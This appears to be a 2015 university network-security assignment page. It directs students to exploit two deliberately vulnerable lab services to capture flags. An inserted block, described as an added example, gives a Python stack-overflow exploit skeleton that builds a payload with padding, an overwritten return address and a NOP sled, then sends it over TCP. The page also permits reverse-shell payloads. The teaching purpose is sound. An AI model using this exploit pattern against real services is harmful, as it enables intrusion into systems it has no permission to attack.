CS 4740 / CS 6740 - Network Security

Project 2: Remote Memory Exploits, Part 1

This project is due at 11:59pm on March 17, 2015.

Description

In this assignment your goal is to exploit two network services that we have set up for you. Each network service is different, and each includes a specific, exploitable vulnerability that you will need to identify. Once you have identified these vulnerabilities, you will need to construct programs that deliver malicious payloads to each service, triggering and exploiting the vulnerabilities.

The Servers

There are two services running on guldendraak.ccs.neu.edu that you will need to attack. These services and their ports are:

The archives linked above contain the source code and build scripts for these services. The exact binaries that are running on Guldendraak are also provided in the archives. Both services are compiled as 32-bit executables without stack protection (-fno-stack-protector, so there are no stack canaries to defeat), and both are statically linked against their libraries. Both services run with ASLR disabled, so the stack and code addresses you observe in one run of a binary hold in the next.

Secret Flags

Each service is running in a directory that includes a secret flag. After you have exploited each service you must collect the corresponding secret flag.

How to Approach This Assignment

For those of you who have never done any exploitation before, this assignment may seem daunting. I would suggest the following approach to tackling each service:

  1. Start by downloading the source code for the service, and understanding what it is doing. Write a simple client that is able to interact with the service.
  2. Re-examine the source code for the service and identify the exploitable bug, as well as any preconditions necessary to trigger the bug. The source code may also contain countermeasures that hinder exploitation that you should identify and devise workarounds for. Disassembling the server software (e.g. with objdump) will be useful during this stage.
  3. Begin developing a program to exploit the server. Start by modifying your client to trigger the bug in the server, with the goal of crashing the server process. It may be useful to run a copy of the server on your own machine and inspect it with gdb to assess the success of your exploit.
  4. Once you have a client that can reliably trigger the bug, improve your exploit by injecting shellcode into the service. Again, you can use gdb to inspect a local copy of the service to help debug this process. However, note that the absolute stack addresses of the service running under gdb will not be the same as when the service is run stand-alone: gdb adds environment variables (e.g. LINES and COLUMNS) and may pass a different argv[0], both of which shift the stack. The distance from the vulnerable buffer to the saved return address does not change, but the address you overwrite it with must be chosen for the stand-alone process; a NOP sled gives you some tolerance.
  5. Finally, launch your attack against the remote service on Guldendraak. Keep in mind that your ultimate goal is to collect the secret flag, so design your shellcode appropriately.
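The steps above, as an added example of the exploit-client skeleton they describe (this is not code from the course or from either service, and the services' real offsets, addresses and ports are not on this page): build_payload lays out padding, an overwritten saved EIP, a NOP sled and the shellcode; find_bad_bytes catches bytes that would truncate the copy; parse_crash_eip reads the faulting address out of gdb's SIGSEGV line from step 3; send_payload delivers the result. BUF_OFFSET, SLED_ADDR and BAD_BYTES are placeholders chosen for illustration only, and the shellcode is a constructed stand-in.

```python
import socket
import struct

# Placeholder values (assumptions for illustration, NOT the real offsets or
# addresses for either service on Guldendraak). Recover the real ones by
# crashing a local copy under gdb and inspecting the saved return address.
BUF_OFFSET = 76           # bytes from the start of the overflowed buffer to the saved EIP
SLED_ADDR = 0xbffff610    # address inside the NOP sled; stable across runs because ASLR is off
NOP = b"\x90"             # x86 single-byte nop
BAD_BYTES = frozenset([0x00, 0x0a])  # bytes that end a strcpy()/line-based read (assumed)


def build_payload(shellcode, offset=BUF_OFFSET, ret_addr=SLED_ADDR, sled_len=64):
    """Classic stack-smash layout: [padding][saved EIP -> sled][NOP sled][shellcode].

    Padding fills the buffer up to the saved return address, the address is
    written little-endian as a 32-bit value (the services are 32-bit), and the
    sled gives the overwritten EIP a tolerance of sled_len bytes.
    """
    padding = b"A" * offset
    ret = struct.pack("<I", ret_addr)
    return padding + ret + NOP * sled_len + shellcode


def find_bad_bytes(payload, bad=BAD_BYTES):
    """Return (index, byte) pairs for every byte that would truncate the copy.

    A payload containing one of these bytes is silently cut short by the
    vulnerable copy loop, so check before sending.
    """
    return [(i, b) for i, b in enumerate(bytearray(payload)) if b in bad]


def parse_crash_eip(gdb_line):
    """Pull the faulting address out of gdb's SIGSEGV report, e.g.
    '0x41414141 in ?? ()'. If it is 0x41414141 the padding reached EIP, so
    the offset to the saved return address is at most the padding length
    used for that run."""
    addr = gdb_line.split()[0]
    return int(addr, 16)


def send_payload(host, port, payload, timeout=5.0):
    """Deliver the payload over TCP and return whatever the service answers.
    Not exercised offline; host and port are whatever the course handed out."""
    s = socket.create_connection((host, port), timeout=timeout)
    try:
        s.sendall(payload)
        chunks = []
        while True:
            try:
                data = s.recv(4096)
            except socket.timeout:
                break
            if not data:
                break
            chunks.append(data)
        return b"".join(chunks)
    finally:
        s.close()


if __name__ == "__main__":
    # Constructed stand-in for real shellcode: int3 breakpoints, which make a
    # local copy under gdb stop with SIGTRAP when execution reaches the sled.
    shellcode = b"\xcc" * 4
    payload = build_payload(shellcode)
    bad = find_bad_bytes(payload)
    if bad:
        raise SystemExit("payload contains bad bytes at %r" % bad)
    print("payload length: %d" % len(payload))
```

Replace the int3 stand-in with real shellcode once the sled is being hit. Since each flag sits in the service's working directory, shellcode that open()s the flag file and write()s it back on the connected socket descriptor is enough; a full shell is not required.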

Accessibility

For security reasons, the services on Guldendraak only accept TCP connections from machines in the Khoury College network. Thus, you must be physically present on campus, tunneled/VPNed to campus, or SSHed into a Khoury College machine in order to access the services.

What You Need to Turn In

To receive credit on this assignment, you will need to turn in all your code, as well as a file named secrets.json that contains the following JSON formatted data:

{
    "service1_secret": "secret flag from the echo server, as a string",
    "service2_secret": "secret flag from the message server, as a string"
}
You can use the following Python commands to test whether your file is valid JSON:
% python
>>> import json
>>> s = json.loads(open('secrets.json').read())
>>> assert isinstance(s["service1_secret"], basestring)
>>> assert isinstance(s["service2_secret"], basestring)
If you see an exception (a ValueError from json.loads, a KeyError for a missing key, or an AssertionError for a value that is not a string), then your file is not formatted correctly (or your file couldn't be found). These commands are written for the Python 2 interpreter installed on the Khoury College machines; basestring does not exist in Python 3.

Language and Libraries

You can write your code in whatever language you choose, as long as your code compiles and runs from the command line on unmodified Khoury College Linux machines. Do not use libraries that are not installed by default on the Khoury College Linux machines. You may use IDEs (e.g. Eclipse) during development, but do not turn in your IDE project without a Makefile. Make sure your code has no dependencies on your IDE.

Shellcode

You may use any shellcode that you wish during this assignment. You may use tools such as Metasploit to help you construct shellcode. If you use shellcode from the Web, you must cite the source of this code. You may use any style of exploit payload that you wish (e.g. command injection, reverse shell, etc.).

Submitting Your Project

If you have not done so already, register yourself for our grading system using the following command:

$ /course/cs6740sp15/bin/register-student [NUID]
NUID is your Northeastern ID number, including any leading zeroes.

Before turning in your project, you and your partner(s) must register your group. To register yourself in a group, execute the following script:

$ /course/cs6740sp15/bin/register project2 [team name]
This will either report back success or will give you an error message. If you have trouble registering, please contact the course staff. You and your partner(s) must all run this script with the same [team name]. This is how we know you are part of the same group.

To turn-in your project, you must submit your code along with a file named secrets.json that contains the secrets obtained from exploiting the services. Your secrets.json file and source code should all be placed in a directory. You submit your project by running the turn-in script as follows:

$ /course/cs6740sp15/bin/turnin project2 [project directory]
[project directory] is the name of the directory with your submission. The script will print out every file that you are submitting, so make sure that it prints out all of the files you wish to submit! The turn-in script will not accept submissions that are missing the secrets.json file. Only one group member needs to submit your project. Your group may submit as many times as you wish; only the last submission will be graded, and the time of the last submission will determine whether your assignment is late.

Grading

This project is worth 13 points. If you submit the correct secret flags then you will receive full credit. We will randomly check students' code to make sure that it works correctly. All student code will be scanned by plagiarism detection software to ensure that students are not copying code from the Internet or each other. Students who are caught cheating will receive a zero on the assignment, and will be reported to OSCCR.